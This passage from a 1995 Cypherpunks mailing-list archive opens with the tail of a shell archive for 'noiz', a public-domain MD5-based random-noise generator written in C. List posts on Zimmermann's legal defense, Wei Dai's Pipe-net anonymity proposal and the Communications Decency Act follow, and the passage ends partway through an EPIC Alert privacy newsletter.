X	In_hash[0..15] := MD5(  Noiz[][], 
X				Input[],
X				time, 
X				pid,
X				ppid,
X				and some extra stuff from sloppy buffering
X			     );
X
X	FOR r := 0 TO 15
X
X	    Out_hash[0..15] := MD5(	Noiz[r],
X					In_hash[0..15],
X					In_hash[0..r]
X	    		   	  );
X
X	    Noiz[r] := Noiz[r] BITWISE_XOR Out_hash[];
X
X	NEXT r
X
X	write Noiz[][] to /etc/noiz
X
X
X
X   Algorithm of "noizout"
X
X	read Noiz[][] from /etc/noiz
X
X	read Input[] from standard input
X
X	Out_hash[0..15] := MD5(  Noiz[][], 
X				 Input[],
X				 time, 
X				 pid,
X				 ppid,
X				 and some extra stuff from sloppy buffering
X			      );
X
X  	write Out_hash[] to standard output 
X
X
X
X
XEND $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noiz.doc,v 1.6 95/02/07 15:35:37 strick Exp Locker: strick $
END_OF_FILE
if test 9532 -ne `wc -c <'noiz.doc'`; then
    echo shar: \"'noiz.doc'\" unpacked with wrong size!
fi
# end of 'noiz.doc'
fi
if test -f 'noiz.h' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noiz.h'\"
else
echo shar: Extracting \"'noiz.h'\" \(395 characters\)
sed "s/^X//" >'noiz.h' <<'END_OF_FILE'
X/* 	noiz.h
X
X	Anticopyright (A) 1995 Henry Strickland <strick@yak.net> 
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X
X
X#define	NOIZ_FILE	"/etc/noiz"
X
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noiz.h,v 1.2 95/02/07 14:19:52 strick Exp Locker: strick $ */
END_OF_FILE
if test 395 -ne `wc -c <'noiz.h'`; then
    echo shar: \"'noiz.h'\" unpacked with wrong size!
fi
# end of 'noiz.h'
fi
if test -f 'noizinit.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizinit.c'\"
else
echo shar: Extracting \"'noizinit.c'\" \(767 characters\)
sed "s/^X//" >'noizinit.c' <<'END_OF_FILE'
X/*      noizinit.c
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X/*
X	This file noizinit.c is dedicated to Richard Stallman,
X	who taught me the joy of free software.
X*/
X
X
X#include <stdio.h>
X#include "noiz.h"
X
Xmain()
X{
X	int e;
X	int i;
X
X	FILE* f= fopen( NOIZ_FILE, "w" );
X	if (!f) goto bad;
X
X	for ( i=0; i<256; i++ ) {
X		e= putc(i,f);
X		if (e==EOF) goto bad;
X	}
X
X	e= fclose(f);
X	if ( e!=0 ) goto bad;
X
X	return 0;
X
Xbad:
X	perror( NOIZ_FILE );
X	exit(255);
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizinit.c,v 1.3 95/02/07 15:28:59 strick Exp Locker: strick $ */
END_OF_FILE
if test 767 -ne `wc -c <'noizinit.c'`; then
    echo shar: \"'noizinit.c'\" unpacked with wrong size!
fi
# end of 'noizinit.c'
fi
if test -f 'noizout.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizout.c'\"
else
echo shar: Extracting \"'noizout.c'\" \(1559 characters\)
sed "s/^X//" >'noizout.c' <<'END_OF_FILE'
X/*      noizstir.c   -- stir the noise file with stdin
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X/* 
X	This file noizout.c is dedicated in memory of John Cage,
X	who explained to me the point of his pointless noise. 
X*/
X
X
X
X#include <stdio.h>
X#include "noiz.h"
X#include "md5.h"
X
Xchar noiz[256];
Xchar pad[256];
X
Xunsigned char out_hash[16];
X
Xstruct MD5Context context;
X
Xmain()
X{
X	int e;
X	int i;
X	long seconds;
X	long pid;
X	long ppid;
X	int row;
X
X	FILE* f= fopen( NOIZ_FILE, "r" );
X	if (!f) goto bad;
X
X	for ( i=0; i<256; i++ ) {
X		e= getc(f);
X		if (e==EOF) goto bad;
X		noiz[i]= e;
X	}
X
X	MD5Init( &context );
X	MD5Update(&context, (unsigned char*) &noiz, 256);
X	while ( fread(pad, 1, 256, stdin) > 0 ) {
X		MD5Update(&context, (unsigned char*) &pad, 256);
X	}
X	time( &seconds );
X	pid= getpid();
X	ppid= getppid();
X	MD5Update( &context, (unsigned char*) &seconds, sizeof seconds );
X	MD5Update( &context, (unsigned char*) &pid, sizeof pid );
X	MD5Update( &context, (unsigned char*) &ppid, sizeof ppid );
X	MD5Final( out_hash, &context );
X
X	for ( i=0; i<16; i++ ) {
X		e= putchar(out_hash[i]);
X		if (e==EOF) goto bad;
X	}
X
X	e= fflush(stdout);
X	if (e==EOF) goto bad;
X	e= fclose(stdout);
X	if (e==EOF) goto bad;
X
X	return 0;
Xbad:
X	perror( NOIZ_FILE );
X	exit(255);
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizout.c,v 1.3 95/02/07 15:29:00 strick Exp Locker: strick $ */
END_OF_FILE
if test 1559 -ne `wc -c <'noizout.c'`; then
    echo shar: \"'noizout.c'\" unpacked with wrong size!
fi
# end of 'noizout.c'
fi
if test -f 'noizspin.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizspin.c'\"
else
echo shar: Extracting \"'noizspin.c'\" \(729 characters\)
sed "s/^X//" >'noizspin.c' <<'END_OF_FILE'
X/*      noizspin.c
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X/*
X	This file noizspin.c is dedicated to Matt Blaze,
X	because I learned the trick from his code.
X*/
X
X
X#include <stdio.h>
X#include <sys/types.h>
X#include <signal.h>
X
Xunsigned long x;
X
Xenough()
X{
X	printf("%lu\n", x );
X	fflush(stdout);
X	exit(0);
X}
X
Xmain()
X{
X	signal( SIGALRM, enough );
X	alarm(1);
X
X	while (1) {
X		++x;
X	}
X
X	/*NOTREACHED*/
X	return 255;
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizspin.c,v 1.1 95/02/07 15:35:39 strick Exp Locker: strick $ */
END_OF_FILE
if test 729 -ne `wc -c <'noizspin.c'`; then
    echo shar: \"'noizspin.c'\" unpacked with wrong size!
fi
# end of 'noizspin.c'
fi
if test -f 'noizstir.c' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'noizstir.c'\"
else
echo shar: Extracting \"'noizstir.c'\" \(1841 characters\)
sed "s/^X//" >'noizstir.c' <<'END_OF_FILE'
X/*      noizstir.c   -- stir the noise file with stdin
X
X        Anticopyright (A) 1995 Henry Strickland <strick@yak.net>
X
X        This package is placed this package in the public domain.
X
X        Because this package is free, there is no warranty
X        for it whatsoever.  Caveat hacker.
X*/
X
X
X/*
X	This file noizstir.c is dedicated to Jacques Atali,
X	in honor of his book "Noise, The Political Economy
X	of Music."
X*/
X
X
X#include <stdio.h>
X#include "noiz.h"
X#include "md5.h"
X
Xchar noiz[256];
Xchar pad[256];
X
Xunsigned char in_hash[16];
Xunsigned char out_hash[16];
X
Xstruct MD5Context context;
X
Xmain()
X{
X	int e;
X	int i;
X	long seconds;
X	long pid;
X	long ppid;
X	int row;
X
X	FILE* f= fopen( NOIZ_FILE, "r+" );
X	if (!f) goto bad;
X
X	for ( i=0; i<256; i++ ) {
X		e= getc(f);
X		if (e==EOF) goto bad;
X		noiz[i]= e;
X	}
X
X	MD5Init( &context );
X	MD5Update(&context, (unsigned char*) &noiz, 256);
X	while ( fread(pad, 1, 256, stdin) > 0 ) {
X		MD5Update(&context, (unsigned char*) &pad, 256);
X	}
X	time( &seconds );
X	pid= getpid();
X	ppid= getppid();
X	MD5Update( &context, (unsigned char*) &seconds, sizeof seconds );
X	MD5Update( &context, (unsigned char*) &pid, sizeof pid );
X	MD5Update( &context, (unsigned char*) &ppid, sizeof ppid );
X	MD5Final( in_hash, &context );
X
X	for (row=0; row<16; row++ ) {
X		MD5Init( &context );
X		MD5Update( &context, noiz+16*row, 16 );
X		MD5Update( &context, in_hash, 16 );
X		MD5Update( &context, in_hash, row+1 );
X		MD5Final( out_hash, &context );
X		for ( i=0; i<16; i++ ) {
X			noiz[16*row+i] ^= out_hash[i];
X		}
X	}
X
X	fflush(f);
X	rewind(f);
X	
X	for ( i=0; i<256; i++ ) {
X		e= putc(noiz[i],f);
X		if (e==EOF) goto bad;
X	}
X
X	e= fclose(f);
X	if (e==EOF) goto bad;
X
X	return 0;
X
Xbad:
X	perror( NOIZ_FILE );
X	exit(255);
X}
X
X/* END $Header: /mvp/fjord/strick/yaxen/noiz-0.5/RCS/noizstir.c,v 1.3 95/02/07 15:29:01 strick Exp Locker: strick $ */
END_OF_FILE
if test 1841 -ne `wc -c <'noizstir.c'`; then
    echo shar: \"'noizstir.c'\" unpacked with wrong size!
fi
# end of 'noizstir.c'
fi
if test -f 'patchlevel' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'patchlevel'\"
else
echo shar: Extracting \"'patchlevel'\" \(2 characters\)
sed "s/^X//" >'patchlevel' <<'END_OF_FILE'
X0
END_OF_FILE
if test 2 -ne `wc -c <'patchlevel'`; then
    echo shar: \"'patchlevel'\" unpacked with wrong size!
fi
# end of 'patchlevel'
fi
if test -f 'version' -a "${1}" != "-c" ; then 
  echo shar: Will not clobber existing file \"'version'\"
else
echo shar: Extracting \"'version'\" \(9 characters\)
sed "s/^X//" >'version' <<'END_OF_FILE'
Xnoiz-0.5
END_OF_FILE
if test 9 -ne `wc -c <'version'`; then
    echo shar: \"'version'\" unpacked with wrong size!
fi
# end of 'version'
fi
echo shar: End of shell archive.
exit 0




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Dubois" <dubois@csn.org>
Date: Tue, 7 Feb 95 15:00:31 PST
To: cypherpunks@toad.com
Subject: Zimmermann
Message-ID: <199502072300.AA20868@teal.csn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Many of you know that members of Philip Zimmermanns
defense team traveled recently to San Jose to meet with
the Assistant U.S. Attorney (AUSA) assigned to the
Zimmermann investigation.  This was done for the purpose of
persuading the AUSA not to indict.  In the hope of avoiding
speculation and misinformation, I write now to report that the
meeting was cordial, that the AUSA listened carefully and
agreed to consider our arguments, and that we dont know when
a decision will be made.

The defense effort continues and remains in need of
financial support.  Before the trip to San Jose, one
generous person donated a plane ticket from his own
frequent-flyer miles.  This contribution was timely and
much appreciated and shows a way for people to
contribute without digging into their pocketbooks.
More travel will be necessary during the next month or
two, and if there is an indictment, a great deal of
travel will be necessary.  Any new contributions,
including plane tickets, will be received with gratitude.

It may seem odd, given the nature of the case, that the
defense effort does not have its own Web page, ftp
site, or other electronically-accessible source of
information.  Keep in mind that youre dealing with a
lawyer who tends not to do things without considerable
deliberation.  The investigation has only been going on
for two years.  Im working on it.

Government investigators may seek to interview people.
It would be helpful to us to hear from such people.
The government is not required to, and will not, tell
us what its up to.  Our only source of information is
people whove been questioned.  There is nothing wrong
with such folks telling us about their interviews, and
it helps us a great deal.  I therefore ask that anyone who has
been approached and/or interviewed by any federal investigator
about Mr. Zimmermann contact me.  My email is dubois@csn.org,
my phone is 303-444-3885, and my mail address is 2305
Broadway, Boulder, CO, 80304-4132.

Ill close by offering thanks.  Mr. Zimmermann and I
very much appreciate the warm reception we were
accorded by the Cypherpunks while we were in
California.  And we are deeply grateful for all your
generous contributions of financial and other support.
Your appreciation of the importance of Mr. Zimmermanns
case to the wider causes of privacy and individual
liberty is encouraging.

Philip L. Dubois
Lawyer for Philip Zimmermann

-----BEGIN PGP SIGNATURE-----
Version: 2.7

iQCVAwUBLze+ebZ7C+AHeDONAQGJbgP9EMCSSQa0nEx2Tyb15IRei4JT3snpui1p
nwrfmeXHLMawsXeUqCbsrZPgo6CJMHryiy/2dAMc+jc4KwUSuNudWZ9wbPGWALUg
PNKlfpGi/3i7Fa+sE/RcR32PQ3vXixk6vYNHMV/mx/ZpjV4pLb31UgHhnjgDuKjv
73t8Klg8D6I=
=lQdU
-----END PGP SIGNATURE-----

From owner-cypherpunks  Tue Feb  7 16:04:47 1995
Return-Path: <owner-cypherpunks>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjwohler@netcom.com (Marc Wohler)
Date: Tue, 7 Feb 95 16:16:53 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: NYC CPUNKS MEET
Message-ID: <199502080013.QAA13710@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Attn.: New York City area Cypherpunks

NYC C'punks meeting:

Sat Feb 11, 3:00 P.M., at the home of Linn & Barbara  Stanton
315 West 106 Street  Apt 2A 
(Between West End Ave & Riverside Drive)
212-316-1958.

Once again the gracious Stanton's invite local area Cpunks to
their lovely home which is smoke free and feline friendly.

The agenda is still open and suggestions can be made to
mjwohler@netcom.com
or phone Marc Wohler @ 212-362-0690. Let me know if you plan to
attend.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy+PL2eikzgqLB7pAQGHigP9HW1Py30O2fcZH/f1SAOToOBZYVZMiB9c
buGQrujaicGVJlvGb1Le/OjJ872JB69BQD1MMsemABSYi4swL15w9qj1rhoTAHIg
yTRDFJD16g1lqqLvEJZ0RijOh1dXLaUg8HNue0JoSAbARkQed8I3+mklP4C4saYn
qW2Fa/kDuZY=
=Rl9C
-----END PGP SIGNATURE-----

-- 
                                              Marc J. Wohler   
                                             mjwohler@netcom.com
***Preserve, Protect and Defend the private use of Strong Crypto***
                 * * * PGP for the masses * * * 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Tue, 7 Feb 95 13:40:58 PST
To: cypherpunks@toad.com
Subject: Child Porno
Message-ID: <Pine.SUN.3.91.950207163815.7583A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Just heard on the radio "How child pornographers are using the 'Net to 
turn your home computer into their playground and why you can't do 
anything because of lax and permissive legislation."

All this over some very discordany chords to make it seeem more ominous.  
Gotta love the evening news here in CT.

From the same people that had a feature of 'MArtial arts weapons as 
weapons of mass destruction and how easy they are to get.'  I wonder if 
the producer is a closet facist or a ratings freak.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Tue, 7 Feb 95 16:58:57 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Seals and Sealing Waxes
In-Reply-To: <ab5d0f8b040210047448@DialupEudora>
Message-ID: <9502080056.AA14295@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain



> "All crypto is economics," and this is what made seals and sealing wax so
> useful for so long. Saying "seals were duplicatable from the start" does
> not mean this feat was easy, even if technically possible.
> 
> In fact, the fine details produced by a good seal are hard to exactly
> emulate with a copy. Even on a two-dimensional surface. And with the advent
> of three-dimensional surfaces, which sealing wax made possible, the fine
> detail of a good seal was in fact very hard to forge.
> 
> Not impossible, but very costly with the technology of the day. Or even the
> technology of _today_. After all, paper currency is largely based on seal
> technology, with various embossing, printing, etc. methods used (on special
> paper) that remain fairly hard to duplicate.

The House Banking, Finance and Urban Affairs Committee last year held
hearings on the redesign of the U.S. currency.  Some of the testimony
about physical document security was pretty interesting (for those
with the requisite proclivities).  I only have a hardcopy, though if
enough people are interested, I might be persuaded to scan some of it
in.


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@aeinet.com>
Date: Tue, 7 Feb 95 17:17:10 PST
To: skaplin@mirage.skypoint.com>
Subject: RE: Effects of S.314 (Communications Decency Act)
Message-ID: <Chameleon.4.01.950207171644.jcorgan@comet.aeinet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>I just had an interesting conversation with a person who works for an ISP.
>Basically their response if S.314 becomes law will be to preprocess all
>incoming mail. If it is uuencoded or encrypted, into the bit bucket it will
>go. They are still thinking about what to do with telnet and ftp.

Sounds like a good application for text stego...

>This is starting to get very scary.

Indeed.

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@aeinet.com                    -Isaac Asimov
WWW:                     ftp://ftp.netcom.com/pub/jc/jcorgan/home.html


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzgbVU1Diok8GKihAQEfJgQAiDd5ha7WCURlwepHgV8qjBYjoT1MxLsF
219ymsRNe/U0bJwSTgt/sBqNjZIS3aQjEQIu+VE3CivvNcVYz0wuZ5KYVf5IADpF
4qtba3bZwENJNjOm9Y/w2m2mWAkEK0I77IPPFdCts0xg6sWWMOVOv4ry2eOQ59uQ
WvTIH1omb58=
=srzZ
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 7 Feb 95 14:16:43 PST
To: cypherpunks@toad.com
Subject: Re: CFP, Cypherpunks, and Crypto
Message-ID: <9502072215.AA20605@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May says:
...
>The Computers, Freedom, and Privacy Conference is to be held 29-31
>March 1995, at the Marriott in Burlingame, CA (SF Airport). Details
>have been distributed recently to most of the usual places.
>
>I'll be on Michael Froomkin's "Crypto" panel on Friday, 31 March.
>Along with Stewart Baker (ex-NSA, famous for "Clipper opponents just
>getting revenge for missing Woodstock"), Steve Walker (TIS), Phil
>Karn, a Microsoft guy, and maybe others. Details should be available.
>

While we're at it, let me put in a plug for my tutorial, "Everything
you need to know to argue about cryptography", to be held Tuesday
afternoon (March 28) as part of the pre-conference tutorial track.
Spread the word...

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Tue, 7 Feb 95 17:32:30 PST
To: cypherpunks@toad.com
Subject: a new way to do anonymity
Message-ID: <199502080132.AA26151@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A week ago I made a suggestion for a new protocol for untracibility, 
but only got one response.  I'll try again, this time more 
forcefully.  I'm not trying to convince anyone to implement this 
(though of course you're welcome to!), but just to think about it and 
give me feedback.

Why is another protocol needed?  Right now we have only two, 
each of which has its own set of tradeoffs.  To summarize:

	Mix-Net (i.e., remailer-net): high latency, moderate bandwidth 
		costs, and low complexity
	DC-Net: moderate latency, high bandwidth costs, and high complexity

While the DC-Net will probably never be widely used, the remailer-net 
has a fair chance of one day 
providing a way for many people to send e-mail that not even governments 
can trace.  However, I don't think this is enough.  Efficient 
social and business relationships require that people be able to 
converse to each other in real time.  Cryptoanarchy will not come about 
if people cannot do this anonymously.  How well can two pseudonymous 
agents negotiate a contract if each message they send must be delayed 
several hours?  The protocol I sugguested would have low latency, moderate 
bandwidth costs, and moderate complexity.  It would be well suited for 
people to interact anonymously in a textual environment.

This is what I wrote:
> Imagine a server that allows you to open a 
> low bandwidth (let's say around 100 cps, in order to reduce costs)
> link-encrypted telnet session with it, and provides you with a number 
> of services, for example a link-encrypted talk session with another 
> user.  You'll need to maintain the link 24 hours a day to defend 
> against statistical analysis, and of course you can chain a number of 
> these servers together in a way similiar to chaining remailers.

Lance pointed out the chain cannot be built quickly.  This is not a problem
if servers connect to each other with relatively wide link-encrypted pipes
and multiplex your connection into these pipes.

In this system, latency would never be more than a few seconds, bandwidth
cost is N*100 cps (point to point), N being the number of links in your chain.
Implementation would probably be harder than remailers, but much easier
than DC-Nets.  The protocol would also provide both sender and receiver
untracibility without any need for broadcasting.

Wei Dai

P.S. I never gave a name for the protocol... let's call it Pipe-net.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzgewDl0sXKgdnV5AQGzvAQAgFaOxOzFPgS031z4jZRYUJp/+3BS5Con
Kza7WsvZPvxzaNLh9ecD3aCx5dtf4muaiUKjC2HIItaLKEdZZPdzUGFd4wg1cY8G
k8mvYNzDImr3ZtQ0HiqQ59PWhznad0GuhjQajB7RtpI+K/Z4uBaUEZGVoZZT+LHN
MSjOl/k/yfg=
=jgq6
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 7 Feb 95 17:33:51 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann
In-Reply-To: <27154.792199642@dblues.engr.sgi.com>
Message-ID: <199502080133.RAA19105@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Jack Repenning <jackr@dblues.engr.sgi.com> writes:
> Has anyone yet discovered the secret reformatting necessary to
> make Phil Dubois' signature check on that message?  The usual

Got it!

	tr ""\022" "\306" < thismessage | pgp26

Some bogus word processor, I'd imagine.

	Jim Gillogly
	Highday, 18 Solmath S.R. 1995, 01:33




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Tue, 7 Feb 95 16:18:29 PST
To: cypherpunks@toad.com
Subject: Effects of S.314 (Communications Decency Act)
Message-ID: <3a0ElKjqRqtP078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just had an interesting conversation with a person who works for an ISP.
Basically their response if S.314 becomes law will be to preprocess all
incoming mail. If it is uuencoded or encrypted, into the bit bucket it will
go. They are still thinking about what to do with telnet and ftp.

This is starting to get very scary.

Sam

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
                 Be careful when playing under the anvil tree.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBLzgMJ8lnXxBRSgfNAQG3Egf9HewkJYboCW6RNABZiQd8K8JVyw3As0S7
Gwno4Flp3L1y/izbCSgVnrNY+oK7vwB5J0OPq4y1TX7gIb/NPasVKkcW9eET1a5X
HJwjbfg7ZbUle5dcktuD1GLC1bZu5Mt39lV8eQKjqHiXYSxc3sWJT3xvtKQ45Pr+
FWsYNALI6Q9R7sBy0Zh0vg61fZHfnlSNi7SxEvE0GZ3e959L0y+AR44UE2HrI1KQ
zfDgFtWiQsDztbVsbReYb4cwCs34Vxv/7v7GjY29SVZIKbeR1aEarR2TJbuT/jry
dP+l4QIxOFv26OIGf5cHgPiWswf1KjosUkDso0Ps8fKf3Wafm5CH2g==
=0WR8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave_Banisar.OFFICE@epic.org
Date: Tue, 7 Feb 95 15:55:42 PST
To: "CPSR  Listserv" <cpsr-announce@cpsr.org>
Subject: EPIC Alert 2.02
Message-ID: <n1419939228.95186@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


    =============================================================
      
       @@@@  @@@@  @@@  @@@@      @    @     @@@@  @@@@  @@@@@
       @     @  @   @   @        @ @   @     @     @  @    @
       @@@@  @@@    @   @       @@@@@  @     @@@   @@@     @
       @     @      @   @       @   @  @     @     @  @    @
       @@@@  @     @@@  @@@@    @   @  @@@@  @@@@  @   @   @

   ==============================================================
   Volume 2.02                                   February 6, 1995
   --------------------------------------------------------------
  
                        Published by the
           Electronic Privacy Information Center (EPIC)
                         Washington, DC
                          info@epic.org

=======================================================================
Table of Contents
=======================================================================

 [1] IRS Backs Off Compliance 2000 Program
 [2] New Secrecy Order Needs Work
 [3] Caller ID Blocking Fails in New York
 [4] Post Office Partially Limits Access to Addresses
 [5] Clinton Announces National ID Registry
 [6] Correction: EU Directive Still Under Consideration
 [7] Overview of New Congressional Privacy Legislation
 [8] Upcoming Conferences and Events

=======================================================================
[1] IRS Backing Off of Compliance 2000 Program
=======================================================================

The Internal Revenue Service announced on Friday, January 20, that it
was delaying implemention of the controversial Compliance 2000 program
after heated opposition to the proposal from the Electronic Privacy
Information Center (EPIC) and other privacy advocates appeared in over
two dozen newspapers across the country.  The proposal also drew sharp
criticism from Senator David Prior.  The plan called for IRS
collection and use of personal information from commercial databases.
This data would not be subject to the requirements of the Privacy Act.

IRS officials told the EPIC Alert that the Compliance 2000 notice
published in the Federal Register was going to be revised in the next
few weeks and then reissued.  IRS Privacy Advocate Robert Veeder said
that the notice had been drafted more than a year ago and that the
program had been revised substantially since then.

EPIC has filed a Freedom of Information Act request with the IRS,
asking for more information about the types of data that would be
collected if Compliance 200 goes forward, the sources of the
information and the proposed uses.


=======================================================================
[2] Draft Secrecy Order Still Needs Work
=======================================================================

The White House recently circulated the latest draft of the
President's long-awaited revised Executive Order on the classification
of national security information.  The current version back-pedals on
favorable proposed reforms of the classification system, retreating
from an earlier proposal that prohibited secrecy when the "public
interest in keeping the information unclassified outweighs the need
for classification."  Such a standard would permit the public and the
news media to challenge classification decisions in court.  The draft
also fails to go far enough in opening the government's civilian
cryptographic activities to public scrutiny.

Efforts to revise the current Executive Order (issued by President
Reagan in 1982) began almost two years ago, soon after the Clinton
Administration assumed office.  Several drafts have circulated since
then, and the issuance of a final revision was anticipated more than a
year ago.  The Center for National Security Studies, the Federation of
American Scientists, the National Security Archive, and EPIC have all
urged the relaxation of classification authority.

EPIC has specifically recommended that classification be removed for
cryptographic information.  In comments submitted to the Information
Security Oversight Office in July 1993, EPIC staff urged removal of
"cryptology" from the categories of information presumed to be
classifiable.  The statement said that the "designation of a routine
privacy-enhancing technology as presumptively a national security
matter is inconsistent with the end of the Cold War and the dramatic
growth of commercial and civilian telecommunications networks.  ...
[Cryptographic] technology today plays an essential role in assuring
the security and privacy of a wide range of communications affecting
finance, education, research, and personal correspondence."

The recent Clinton proposal does indeed narrow the government's
classification authority for "cryptology", although the final order
should go further.  Under the original Reagan Order, "cryptology" was
singled out as a separate and independent category. The recent draft
drops cryptology as an independent category and instead refers
generally to "intelligence activities (including special operations),
intelligence sources or methods, or cryptology."

This formulation suggests a recognition that information concerning
encryption technology should only be classified if it relates to
intelligence uses of the technology, as opposed to the increasing use
of encryption in civilian applications.  The language, however, leaves
open the possibility that the government might still attempt to
classify information relating to cryptography.  This position  does
not comport with the overwhelming opinion outside of government that
cryptography  should never be presumptively classified.

The classification of cryptographic information has already hampered
the public's ability to monitor the government's activities in the
area of civilian communications security.  Information relating to the
Digital Signature Standard (intended for the authentication of
unclassified electronic transmissions) has been withheld from
disclosure under the Reagan Executive Order.  Likewise, key
information concerning the Clipper encryption initiative (including
the underlying Skipjack algorithm) has been classified and placed
beyond public review.

Congress sought to prevent such secrecy when it enacted the Computer
Security Act of 1987, which limited the civilian role of the National
Security Agency (NSA).  Congress noted that NSA's "natural tendency to
restrict and even deny access to information that it deems important
would disqualify that agency from being put in charge of the
protection of non-national security information."  The Clinton
Administration, through further revision of its draft Executive Order,
has an opportunity to build upon the openness and accountability that
Congress envisioned.


=======================================================================
[3] Caller ID Blocking Fails in New York
=======================================================================

NYNEX has admitted that the personal phone numbers of at least 30,000
of its customers who requested per-line blocking of Caller ID have
been improperly disclosed.  The problem resulted from a failure to
correctly implement the blocking feature. The New York Times reports
that NYNEX had known of the problem for at least a year before any
action was taken.

The Rhode Island Public Utilities Commission has ordered NYNEX not to
allow customers in that state to order new Caller ID services or per
line blocking until the problem is resolved.  NYNEX must also run ads
telling customers about the problem and provide an 800 number for
consumers to call.

EPIC has received several calls from individuals in New York who have
had their phone numbers disclosed.  The individuals work in sensitive
jobs and have already received threatening phone calls as a result of
the disclosures.


=======================================================================
[4] Post Office Partially Limits Access to Addresses
=======================================================================

The U.S. Postal Service announced on December 28 its final rule on
access to names and addresses.  The agency announced it was
eliminating the service that allows anyone to obtain the new address
of any individual for a $3.00 fee.  The Postal Service, however, left
intact its service that provides the addresses of all postal customers
to large mailers such as direct marketers.

The notice states "Congress has not given the Postal Service the
function of serving as a national registration point for the physical
whereabouts of individuals."

HR 434, The Postal Privacy Act of 1995, (introduced by Rep. Gary
Condit) requires that the Postal Service inform individuals of the
uses of information contained in Change of Address cards and mandates
that customers be offered an option to not have their names and
addresses forwarded.


=======================================================================
[5] Clinton Announces National ID Worker Registry
=======================================================================

In the annual State of the Union address on January 25, President
Clinton announced his support for the creation of a national registry
of all citizens and resident aliens to enforce immigration laws.  The
idea was recommended the U.S. Commission on Immigration Reform, headed
by former Rep. Barbara Jordan.

The proposal would create a national database of all employees based
on Social Security Numbers that every employer would be required to
check before hiring.  Civil liberties groups believe that this
database, once in place, would then be used for other purposes, such
as law enforcement, and would eventually lead to the development of a
national ID card.  The Commission has previously considered requiring
